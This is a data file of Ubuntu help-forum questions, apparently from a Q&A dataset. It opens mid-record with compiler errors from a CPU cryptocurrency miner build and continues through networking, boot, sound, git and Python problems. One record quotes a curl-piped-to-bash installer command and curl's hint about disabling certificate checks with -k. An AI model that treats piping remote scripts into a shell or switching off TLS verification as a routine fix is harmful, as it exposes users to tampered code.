x5/luffa_for_sse2.c:749 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c : in function ‘rnd512’ : x5/luffa_for_sse2.c:756 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:756 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:757 : error : expected ‘ ; ’ before ‘chainv’ x5/luffa_for_sse2.c:758 : error : expected ‘ ; ’ before ‘msg’ x5/luffa_for_sse2.c:759 : error : expected ‘ ; ’ before ‘tmp’ x5/luffa_for_sse2.c:760 : error : expected ‘ ; ’ before ‘x’ x5/luffa_for_sse2.c:763 : error : ‘chainv’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:763 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:764 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:765 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:766 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:767 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:768 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:769 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:770 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:771 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:772 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:774 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:785 : error : ‘tmp’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:785 : error : ‘mask’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:787 : error : ‘msg’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:787 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:788 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:864 : error : ‘x’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:868 : error : ‘allone’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:868 : error : ‘cns128’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:879 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:880 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:881 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:882 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:883 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:884 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:885 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:886 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:887 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:888 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c : in function ‘finalization224’ : x5/luffa_for_sse2.c:899 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:899 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:907 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:907 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:908 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:909 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:910 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:911 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:912 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:917 : warning : implicit declaration of function ‘_mm_storeu_si128’ x5/luffa_for_sse2.c:917 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:918 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c : in function ‘finalization256’ : x5/luffa_for_sse2.c:927 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:927 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:935 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:935 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:936 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:937 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:938 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:939 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:940 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:945 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:946 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c : in function ‘finalization384’ : x5/luffa_for_sse2.c:955 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:955 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:963 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:963 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:964 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:965 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:966 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:967 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:968 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:969 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:970 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:975 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:976 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:983 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:984 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:985 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:986 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:990 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c : in function ‘finalization512’ : x5/luffa_for_sse2.c:999 : error : ‘__m128i’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:999 : error : expected ‘ ; ’ before ‘t’ x5/luffa_for_sse2.c:1007 : error : ‘t’ undeclared ( first use in this function ) x5/luffa_for_sse2.c:1007 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1008 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1009 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1010 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1011 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1012 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1013 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1014 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1015 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1016 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1021 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:1022 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:1029 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1030 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1031 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1032 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1033 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1034 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1035 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1036 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1037 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1038 : error : ‘hashstate’ has no member named ‘chainv’ x5/luffa_for_sse2.c:1043 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c:1044 : error : expected expression before ‘ ) ’ token x5/luffa_for_sse2.c : in function ‘process_last_msgs256’ : x5/luffa_for_sse2.c:1059 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c : in function ‘process_last_msgs384’ : x5/luffa_for_sse2.c:1087 : error : ‘hashstate’ has no member named ‘bitlen’ x5/luffa_for_sse2.c : in function ‘process_last_msgs512’ : x5/luffa_for_sse2.c:1115 : error : ‘hashstate’ has no member named ‘bitlen’ make [ 2 ] : *** [ minerd-luffa_for_sse2.o ] error 1 make [ 2 ] : leaving directory/home/user/downloads/darkcoin-cpuminer-1.2c-master' make [ 1 ] : * [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/user/downloads/darkcoin-cpuminer-1.2c-master' make : * [ all ] error 2 what could be the reason and how could i fix it ? i want to mine litecoins using the x11 algorithm using my cpu and thus i want to use this application/miner . i am ready to provide any other information needed for debugging . thanx in advance .
493039	no network device detected ubuntu 14.04	it works okay from my first install of 14.04 , but after several updates made due to some applications that requires update , it suddenly disappear . even the modem manager were it used to detect my usb modem were not working anymore . on the live cd , the network works fine including my usb modem is usable . my target is to fix first the network thing cause i can have an internet sharing using my other desktop , but that wo n't work if i do n't have my network device working . here 's my info that might help for helping me lspci -nn | grep -e 0200 -e 0280 output : 02:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 )
493048	wifi is getting disconnected after 10/15 minutes	my wifi is getting disconnected after 10/15 minutes.i am using ubuntu 12.4 . your suggestion is appreciated . thanks in advance
493050	go back to vim 's default color	i read this : highlight normal ctermfg=grey ctermbg=darkblue from http : //stackoverflow.com/questions/1117526/setting-the-vim-background-colors but i change the darkblue to white ! ! what i done ? omg ? now i even can not see what i type on vim on the command mode . please tell me how to tell vim to use its default coloring .
493051	just installed ubuntu 14.04 but after restart it wont boot	i used a live usb to install ubuntu 14.04 and completely erase windows 8.1 , the installation went fine but when i restarted the computer ubuntu would n't boot from my hdd , instead it came up with try ubuntu or install ubuntu so i restarted without the live usb plugged in and i got an error message reboot and select a proper boot device or insert boot media in selected boot device and press any key . i read a lot of posts about people that had similar problems but so far none of the solutions that worked for them have worked for me . i also ran boot-repair but that did n't fix the problem either . here is the link from boot-repair http : //paste.ubuntu.com/7763898/ please any help would be appreciated . my laptop is a toshiba satellite u50d-a notebook with amd a6-5200 processor
493053	using git under proxy on ubuntu	i do git clone using terminal on ubuntu 14.04 i.e git clone git @ github.com : myusername/myrepo.git . before i did it , i set git to use proxy with command : git config -- global http.proxy proxyserver : port . however , i got this erros message when trying to clone my repo on git . help needed . cloning into 'my repo ' ... ssh_exchange_identification : connection closed by remote host fatal : could not read from remote repository . please make sure you have the correct access rights and the repository exists .
493055	how to redirect usb dvd burning from ubuntu 12.04 to windows 7	i have a home ubuntu 12.04.4 64bit machine equipped with an external cd/dvd writer drive attached via usb port . and in my office i have a windows 7 64bit machine . i want to redirect my usb dvd drive via remote desktop or any kind of remote connection so that i can see my drive as if it 's connected directly to remote server .
493059	shutdown the system after a specific time from command line ?	sometimes after i finished my work at computer i need to leave it open for a specific time to do some other jobs , then after a specific time it should close itself . i have looked at the shutdown command , but i did n't found yet the right way ...
493063	unison - automatically sync computers	is there a way two sync multiple computers ( i.e . particular directories in the home folder ) automatically using unison ? if not , is there an alternative that can do this ? i 'm not completely against opening unison all the time and doing the sync manually , but when it opens you must select a profile , which corresponds to just one directory , so you have to sync each individually . add to that , the ip address is dynamic , and therefore has to be edited . this is quite tedious , and it seems there should be a simpler way . am i missing something ? is there a way to simplify this process ( possibly a bash script ) ?
493066	filezilla server interface not working with wine and xubuntu 14.04	i have installed filezilla server ( with wine ) and am having problems with the `` server interface '' 1. my mac can not connect to the server using localhost or ip : 127.0.0.1 with the server running2 . now when i click on the `` filezilla server interface '' i get `` stop server ? '' and no interface to change users and other settings ? ? any ideas ?
493068	which version of ubuntu is arm build ?	i 'm considering to use ubuntu for a platform of our company 's development effort of the main control unit in our country 's national road vms ( variable message sign ) system . in relation to that , i want to know the embedded version of ubuntu . our minimum system requirements are as follows : - 32bit processor - 400mhz+ - ssd size : 16gb+ - os : windows embedded xp or better thank you very much , in advance . -- jb
493070	where are the settings modified by `` unity-tweak-tool '' stored ?	where are the settings as modified by `` unity-tweak-tool '' stored ? can they be edited with a text editor ? is there documentation , manual or help on the available options ? are there options not available in the gui ? which ? where is the documentation available ? are there system wide pre-sets possible ? are there automation guidelines ?
493073	lost sound ubuntu 14.04 , tried everything	today my sound stopped working , i have tried several things listed in the forums and still rolled a big fat 0 . here is my alsa info . ! ! script ran on : tue jul 8 05:51:51 utc 2014 ! ! linux distribution ! ! -- -- -- -- -- -- -- -- -- ubuntu 14.04 lts \n \l distrib_id=ubuntu distrib_description= '' ubuntu 14.04 lts '' name= '' ubuntu '' id=ubuntu id_like=debian pretty_name= '' ubuntu 14.04 lts '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' ! ! dmi information ! ! -- -- -- -- -- -- -- - manufacturer : toshiba product name : satellite l55-a product version : psklau-01200e firmware version : 1.20 ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.13.0-30-generic operating system : gnu/linux architecture : x86_64 processor : x86_64 smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : k3.13.0-30-generic library version : 1.0.25 utilities version : 1.0.27.2 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel ! ! sound servers on this system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- pulseaudio : installed - yes ( /usr/bin/pulseaudio ) running - yes ! ! soundcards recognised by alsa ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xc8610000 irq 44 ! ! pci soundcards installed in the system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) ! ! alsa/hda dmesg ! ! -- -- -- -- -- -- -- [ 11.321684 ] lpc_ich : resource conflict ( s ) found affecting gpio_ich [ 11.321884 ] snd_hda_intel 0000:00:1b.0 : irq 44 for msi/msi-x [ 11.343623 ] sku : nid=0x1d sku_cfg=0x40f79a2d -- [ 11.344245 ] realtek : enabling init asm_id=0x9a2d codec_id=10ec0269 [ 11.353890 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input9 [ 11.355657 ] input : hda intel pch headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input8 [ 11.355708 ] input : hda intel pch mic as /devices/pci0000:00/0000:00:1b.0/sound/card0/input7 [ 11.633485 ] ext4-fs ( sda2 ) : re-mounted . opts : errors=remount-ro
493074	ubuntu rvm installlation	i try to install rvm on ubuntu 14.04 , but i got error after below command : curl -l https : //get.rvm.io | bash -s stable -- autolibs=enabled error message : serifsadi @ serifsadi-ubuntu-hp : ~ $ curl -l https : //get.rvm.io | bash -s stable -- autolibs=enabled % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- :100 184 100 184 0 0 295 0 -- : -- : -- -- : -- : -- -- : -- : -- 295 0 0 0 0 0 0 0 0 -- : -- : -- -- : -- : -- -- : -- : -- 0 curl : ( 60 ) ssl certificate problem : unable to get local issuer certificate more details here : http : //curl.haxx.se/docs/sslcerts.html curl performs ssl certificate verification by default , using a `` bundle '' of certificate authority ( ca ) public keys ( ca certs ) . if the default bundle file is n't adequate , you can specify an alternate file using the -- cacert option . if this https server uses a certificate signed by a ca represented in the bundle , the certificate verification probably failed due to a problem with the certificate ( it might be expired , or the name might not match the domain name in the url ) . if you 'd like to turn off curl 's verification of the certificate , use the -k ( or -- insecure ) option . what should i do ? thanks in advance .
493076	how to install monyog in ubuntu ?	i 'm newbie to ubuntu , i wants to install monyog . and , i 'm trying to install and download cnet , its download tar.gz format . but i do n't how install that , ..monyog-5.5.8-0.x86_64.tar.gz after i complete the download and see readme its says like =============================================================================== 2 . configuring monyog on linux =============================================================================== monyog port and password are configurable through `` monyog.ini '' . if monyog was installed from the rpm package , monyog.ini can be found in : /usr/local/monyog if monyog is extracted from the tarball ( .tar.gz package ) , monyog.ini can be found in the directory where monyog was extracted . the content of this file looks like : [ general ] port=5555 password=mypasswd note : monyog should be stopped before editing this file , and restarted once changes are saved . and monyog.ini looks like here , [ general ] port=5555 password= data_path=/home/ubuntu/downloads/monyog/bin/..//data registration_name= key= install_id=e1dbc993-3c5a-4869-984c-d5c04c07837f i think its extracting and extracting file is look here , home/monyog try this only look like here , ubuntu @ p3-sd1 : ~ $ cd /home/ubuntu/downloads ubuntu @ p3-sd1 : ~/downloads $ sudo mv monyog-5.5.8-0.x86_64.tar.gz ~ ubuntu @ p3-sd1 : ~/downloads $ cd ~ ubuntu @ p3-sd1 : ~ $ tar -xf monyog-5.5.8-0.x86_64.tar.gz ubuntu @ p3-sd1 : ~ $ thanks in advance ...
493082	how to split byobu screen ?	on the byobu wikipedia page there is a screenshot with the terminal screen : can somebody explain me what programs are used here ? my guess - at the bottom - vim , top right - terminal , top left - i do n't know . and how to make such byobu screen ?
493088	how can i automatically reboot machine after usb pull off ?	i have this situation - i 've got a boot-able pen-drive with ubuntu 12.04 for automated installation - when i plug the usb stick in installation begins from it . at the end of installation process i want to put a message on screen to user to pull out the usb stick - because else the installation will be committed again and again after reboot . so the case is to automatically reboots the machine after the message is shown and pendrive is pulled off from machine . any ideas how to achieve this ?
493089	usb mouse stops working after nvidia proprietary driver installation	after installation of nvidia drivers ( 331.38 ) through driver manager on ubuntu 14.04 , after a while usb mouse stops working without any success of reconnecting it ( only reboot helps ) . when falling back to nouveau everything works properly . i could n't find anything related to this problem in here or anywhere else . bus 002 device 002 : id 0bda:8178 realtek semiconductor corp. rtl8192cu 802.11n wlan adapter bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 04f3:0103 elan microelectronics corp. activejet k-2024 multimedia keyboard bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 004 : id 04d9 : fa50 holtek semiconductor , inc . bus 003 device 003 : id 1b1c:0a03 corsair bus 003 device 002 : id 2687 : fb01 bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
493092	keeping a nas connection active	i can see the network server , i 'm using nas4free as my nas . i can mount/unmount a/the network drive , copying files , moving files create new files etc . then i would not access the drive for a number of minutes and find on my return to the mounted drive , i 'm prompted that some program has dropped the connection and can not connect now . i 've started using this command in the terminal : sudo /etc/init.d/networking restart which re-establishes the connection for me and i can continue to use same connection . and this ping command also works : ping -i 30 [ ip address here ] is there a way to automate the sudo command or ping command or some other process to keep this connection active in any way ? this is not a wireless connection . and may i just say , i do not have similar problems in windows when mapping a network drive . thanks , any help will be greatly appreciated .
493094	wo n't log in after fresh install of 13.04 to external hdd	i 'm using a computer with a busted internal hdd so i 'm trying to install ubuntu ( 13.04 , the only live disc i have ) to an external hdd , but when it boots to the logon screen and i type my password , or click log in for the guest session , it just freezes and wo n't respond to mouse clicks or keyboard input though i can move the mouse . it 's a brand new hdd and a fresh install . when it booted there was an error message breifly before the bootup splash screen which said something like `` hdd_identity ... hdio invalid argument '' bu i 'm not sure because it only flashes very quickly . any ideas what 's causing it/how to fix it ? i 'm reinstalling from the live disc right now .
493096	how can i move all content of catalog ?	i have : /home/www/project and /home/www/project/test_git how can i move all content of test_git catalog into : /home/www/project ?
493099	upgrade to 14.04 , is there 32 bit version	i am thinking of upgrading to ubuntu 13.04 or even 14.04 but my os is apparently 32 bit . i have an intel dual-core 1.8ghx x 2 processor and 2 gb of ram and plenty of hd . will it cope and how do i find a 32bit download ?
493101	nvidia gpu ubuntu support	quick question . i 'm building a workstation at present ( based on : i7 , 16gb , 120ssd , asus mobo ) . my question is really to do with gpu support . i 'm considering something from the nvidia range ( 750 ) but would like some idea how well ubuntu supports all the `` bells and whistles '' of these modern gpu 's . apologies if this has been covered already , but information online specific to ubuntu from real users would be very much appreciated . i intend to use steam ( for gaming ) and graphics apps ( aka : gimp , inskape , blender and scribus ) . thanks in advance , m
493103	python libraries are not updated , except in ipython	i have used pip to update and install some libraries on a computer that hadd an old numpy version . but it does n't seem to be actually applied : davidm @ illergard : ~ $ python python 2.7.3 ( default , feb 27 2014 , 19:58:35 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import numpy > > > numpy.__version__ '1.6.1' ipython , on the other hand , does see the new libraries : davidm @ illergard : ~ $ ipython python 2.7.3 ( default , feb 27 2014 , 19:58:35 ) type `` copyright '' , `` credits '' or `` license '' for more information . ipython 2.1.0 -- an enhanced interactive python . ? - > introduction and overview of ipython 's features . % quickref - > quick reference . help - > python 's own help system . object ? - > details about 'object ' , use 'object ? ? ' for extra details . in [ 1 ] : import numpy in [ 2 ] : numpy.__version__ out [ 2 ] : '1.8.1' this would suggest ipython is running a different python . let 's see it : davidm @ illergard : ~ $ which python /usr/bin/python davidm @ illergard : ~ $ which ipython /usr/local/bin/ipython davidm @ illergard : ~ $ cat /usr/local/bin/ipython # ! /usr/bin/python # easy-install-entry-script : 'ipython==2.1.0 ' , 'console_scripts ' , 'ipython' __requires__ = 'ipython==2.1.0' import sys from pkg_resources import load_entry_point if __name__ == '__main__ ' : sys.exit ( load_entry_point ( 'ipython==2.1.0 ' , 'console_scripts ' , 'ipython ' ) ( ) ) the shebang corresponds to the very same python ! virtualenv is not installed , so that is not the problem . system information : davidm @ illergard : ~ $ uname -a linux illergard 3.2.0-65-generic # 99-ubuntu smp fri jul 4 21:03:29 utc 2014 x86_64 x86_64 x86_64 gnu/linux davidm @ illergard : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise related : http : //stackoverflow.com/questions/9386048/ipython-reads-wrong-python-version
493104	ubuntu 14.04 loosing wifi connection	i using ubuntu 14.04 and i connecting to wifi using network manager from system tray . the wifi works fine , but after 5 minutes i loosing internet , but i 'm still connected to wifi and i need reconnect with network to have internet again . i sending log from wireless_script . i hope somebody will help me with this problem . thanks a lot ! # # # # # # # # # # wireless info start # # # # # # # # # # # # # # # release # # # # # distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty # # # # # kernel # # # # # linux kris-ubuntu 3.13.0-30-generic # 55-ubuntu smp fri jul 4 21:40:53 utc 2014 x86_64 x86_64 x86_64 gnu/linux # # # # # lspci # # # # # 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 03 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8169 # # # # # lsusb # # # # # bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 003 : id 04f3:0103 elan microelectronics corp. activejet k-2024 multimedia keyboard bus 008 device 002 : id 1532:0016 razer usa , ltd deathadder mouse bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan adapter bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub # # # # # pcmcia card info # # # # # # # # # # rfkill # # # # # 0 : phy0 : wireless lan soft blocked : no hard blocked : no # # # # # lsmod # # # # # rtl8192cu 67723 0 rtl_usb 18448 1 rtl8192cu rtlwifi 63475 2 rtl_usb , rtl8192cu rtl8192c_common 53172 1 rtl8192cu mac80211 626557 3 rtl_usb , rtlwifi , rtl8192cu cfg80211 484040 2 mac80211 , rtlwifi # # # # # iw reg get # # # # # country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss # # # # # interfaces # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # # # # # iwconfig # # # # # wlan0 ieee 802.11bgn essid : '' tncap2355ad-tescobroadband '' mode : managed frequency:2.462 ghz access point : < mac address removed > bit rate=65 mb/s tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off link quality=60/70 signal level=-50 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:21 missed beacon:0 # # # # # route # # # # # kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0 # # # # # resolv.conf # # # # # nameserver 127.0.1.1 search lan # # # # # nm-tool # # # # # networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : < mac address removed > capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ tncap2355ad-tescobroadband ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192cu state : connected default : yes hw address : < mac address removed > capabilities : speed : 65 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) bl-mp01-dfaadc : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 100 *tncap2355ad-tescobroadband : infra , < mac address removed > , freq 2462 mhz , rate 54 mb/s , strength 70 wpa wpa2 ipv4 settings : address : 192.168.1.101 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 192.168.1.254 # # # # # networkmanager.state # # # # # [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true # # # # # networkmanager.conf # # # # # [ main ] plugins=ifupdown , keyfile , ofono dns=dnsmasq [ ifupdown ] managed=false # # # # # iwlist # # # # # wlan0 scan completed : cell 01 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=62/70 signal level=-48 dbm encryption key : on essid : '' tncap2355ad-tescobroadband '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 18 mb/s 24 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 9 mb/s ; 12 mb/s ; 48 mb/s mode : master extra : tsf=0000003585d7ba52 extra : last beacon : 8ms ago ie : unknown : 001a544e4341503233353541442d546573636f42726f616462616e64 ie : unknown : 010882848b962430486c ie : unknown : 03010b ie : unknown : 2a0104 ie : unknown : 2f0104 ie : ieee 802.11i/wpa2 version 1 group cipher : tkip pairwise ciphers ( 1 ) : ccmp authentication suites ( 1 ) : psk ie : unknown : 32040c121860 ie : unknown : 2d1a1e181bffff000000000000000000000000000000000000000000 ie : unknown : 3d160b080400000000000000000000000000000000000000 ie : unknown : 4a0e14000a002c01c800140005001900 ie : unknown : 7f0101 ie : unknown : dd9b0050f204104a0001101044000102103b0001031047001092dd212fae0f5466b45d5ab5c22e90f31021000b546563686e69636f6c6f721023000e546563686e69636f6c6f72205447102400043538326e10420010623736663736343562336131623566391054000800060050f204000110110012546563686e69636f6c6f722054473538326e100800020004103c0001011049000600372a000120 ie : unknown : dd090010180206000c0000 ie : wpa version 1 group cipher : tkip pairwise ciphers ( 1 ) : tkip authentication suites ( 1 ) : psk ie : unknown : dd180050f2020101000003a4000027a4000042435e0062322f00 cell 02 - address : < mac address removed > channel:11 frequency:2.462 ghz ( channel 11 ) quality=70/70 signal level=-10 dbm encryption key : off essid : '' bl-mp01-dfaadc '' bit rates:1 mb/s ; 2 mb/s ; 5.5 mb/s ; 11 mb/s ; 9 mb/s 18 mb/s ; 36 mb/s ; 54 mb/s bit rates:6 mb/s ; 12 mb/s ; 24 mb/s ; 48 mb/s mode : master extra : tsf=0000000b1d41fa49 extra : last beacon : 8ms ago ie : unknown : 000e424c2d4d5030312d444641414443 ie : unknown : 010882848b961224486c ie : unknown : 03010b ie : unknown : 2a0104 ie : unknown : 32040c183060 ie : unknown : 2d1a6e1117ff000000010000000000000000000000000c0000000000 ie : unknown : 3d160b070000000000000000000000000000000000000000 ie : unknown : 3e0100 ie : unknown : 